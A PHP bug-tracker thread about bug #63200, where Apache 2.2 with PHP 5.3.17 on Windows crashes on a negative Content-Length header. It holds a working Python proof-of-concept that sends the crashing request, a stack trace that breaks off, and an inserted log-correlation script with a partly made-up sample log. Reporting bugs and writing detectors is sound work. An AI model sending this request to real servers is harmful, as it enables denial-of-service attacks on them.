[PHP-BUG] Bug #63200 [NEW]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

2012-10-02 Thread chris at whyley dot com
From: chris at whyley dot com
Operating system: Windows Server 2003
PHP version:  5.3.17
Package:  Reproducible crash
Bug Type: Bug
Bug description: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

Description:

Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following:

(1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf:

ErrorDocument 413 /error/

(2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate"

When this is run, Apache crashes with the following error:

[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.

This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm

The script could be used to perform DoS attacks on vulnerable systems.

Test script:
---
#!/usr/bin/python

import socket, sys

target = "10.211.55.3"
port = 80

# Bare GET request carrying a negative Content-Length together with
# "Accept-Encoding: gzip, deflate", the combination described above.
request  = "GET / HTTP/1.1\n"
request += "Host: " + target + "\n"
request += "Accept-Encoding:gzip, deflate\n"
request += "Content-Length: -1\n\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
except socket.error:
    print("[-] Connection to %s:%s failed!" % (target, port))
    sys.exit(0)
print("[+] Sending HTTP request. Check for crash on target.")
s.send(request.encode())
s.close()

Expected result:

Stable Apache, no crash.

Actual result:
--
Thread 2 - System ID 3008
Entry point   msvcrt!_endthreadex+3a
Create time   10/2/2012 2:29:08 PM
Time spent in user mode   0 Days 0:0:0.0
Time spent in kernel mode   0 Days 0:0:0.15

Full Call Stack

Function Arg 1 Arg 2 Arg 3 Arg 4   Source
php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985
php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27
php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a
php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0 007339f4   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9
php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8
php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b
php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810 016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36
php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150 016b0150   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242
php5ts!zend_execute_scripts+c4 0002 016b0150 0001   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234
php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200   c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 13
libhttpd!ap_run_handler+25 00fba200 6eed3de0 00fba200 00634f68
libhttpd!ap_invoke_handler+b0 00fb8938 018ee8f8 6ff0ef68
libhttpd!ap_internal_redirect+37 00634f68 00fb8938 00eb6c50 019d
libhttpd!ap_die+1e8 00fb8938 0001 00fba118
libhttpd!ap_http_header_filter+9f 00fb96f8 00fba118 00fba118 018ee974
libhttpd!ap_pass_brigade+52 00fb96f8 00fba118 00fba118
libhttpd!ap_content_length_filter+a9 00fb96e0 00eb6cb0 00fb96c8 018ee9e0
libhttpd!ap_pass_brigade+52 00fb96e0 00fba118 6fba4309 00fba118
libhttpd!ap_byterange_filter+474 00fb96c8 00fba118 00fba060 018eea1c
libhttpd!ap_pass_brigade+52 00fb96c8 00fba118 00eb6cb0 00fba118
mod_deflate+1352 00fba060 00fba118 00fba0c0 018eea58
libhttpd!ap_pass_brigade
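Added here as a defender-side example, not part of the bug report: a small Python log correlator that pairs the "Invalid Content-Length" error line with the "child process exited with status 3221225477" notice quoted above, within a configurable time window, and decodes that status as 0xC0000005 (a Windows access violation). The sample log is constructed: its first two lines are the ones from the report, the last two are made up so that an error with no crash inside the window can be seen to be ignored.

```python
import re
from datetime import datetime, timedelta

# Constructed sample error_log: lines 1-2 are the pair quoted in the report,
# lines 3-4 are made up to show an error with no crash inside the window.
SAMPLE_LOG = """\
[Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length
[Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.
[Tue Oct 02 13:50:01 2012] [error] [client 10.211.55.9] Invalid Content-Length
[Tue Oct 02 13:55:40 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting.
"""

LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?P<msg>.*)$")
CLIENT_RE = re.compile(r"^\[client (?P<ip>[^\]]+)\] (?P<text>.*)$")
EXIT_RE = re.compile(r"child process exited with status (?P<status>\d+)")
STATUS_ACCESS_VIOLATION = 0xC0000005   # == 3221225477, the exit status in the report


def parse_line(line):
    """Split an Apache 2.2 error_log line into (timestamp, level, message)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("level"), m.group("msg")


def correlate(log_text, window_seconds=30):
    """Pair each 'Invalid Content-Length' error with a child-process exit that
    follows it within window_seconds; returns one dict per pairing."""
    window = timedelta(seconds=window_seconds)
    pending, findings = [], []    # pending: (timestamp, client ip) of unmatched errors
    for raw in log_text.splitlines():
        parsed = parse_line(raw)
        if parsed is None:
            continue
        ts, level, msg = parsed
        client = CLIENT_RE.match(msg)
        if level == "error" and client and client.group("text") == "Invalid Content-Length":
            pending.append((ts, client.group("ip")))
            continue
        crash = EXIT_RE.search(msg)
        if level == "notice" and crash:
            status = int(crash.group("status"))
            for err_ts, ip in pending:
                if timedelta(0) <= ts - err_ts <= window:
                    findings.append({"client": ip, "error_at": err_ts, "crash_at": ts,
                                     "status": status, "access_violation": status == STATUS_ACCESS_VIOLATION})
            pending = []    # after a restart, older errors are stale
    return findings
```

With the default 30-second window only the report's own pair is flagged; widening the window to 600 seconds also pairs the constructed second error with the later restart.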

Bug #63200 [Com]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

2012-10-05 Thread chris at whyley dot com
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID:                 63200
 Comment by:         chris at whyley dot com
 Reported by:        chris at whyley dot com
 Summary:            Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
 Status:             Feedback
 Type:               Bug
 Package:            Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:        5.3.17
 Block user comment: N
 Private report:     N

 New Comment:

I have not tested this issue under version 5.4 as my environment is set up for 5.3.17 - are you able to recreate it in 5.3.17?

It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen.


Previous Comments:

[2012-10-05 04:26:26] larue...@php.net

I cannot reproduce this with 5.4, and from the backtrace, it seems to crash in another place.

So, is it related to your index.php? Does it always crash no matter what the index.php is?



Bug #63200 [NoF->Opn]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header

2013-02-18 Thread chris at whyley dot com
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1

 ID:                 63200
 User updated by:    chris at whyley dot com
 Reported by:        chris at whyley dot com
 Summary:            Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
-Status:             No Feedback
+Status:             Open
 Type:               Bug
 Package:            Reproducible crash
 Operating System:   Windows Server 2003
 PHP Version:        5.3.17
 Block user comment: N
 Private report:     N

 New Comment:

Re-opening this bug as it still exists in the 5.3 stream.


Previous Comments:

[2013-02-18 00:36:03] php-bugs at lists dot php dot net

No feedback was provided. The bug is being suspended because
we assume that you are no longer experiencing the problem.
If this is not the case and you are able to provide the
information that was requested earlier, please do so and
change the status of the bug back to "Open". Thank you.

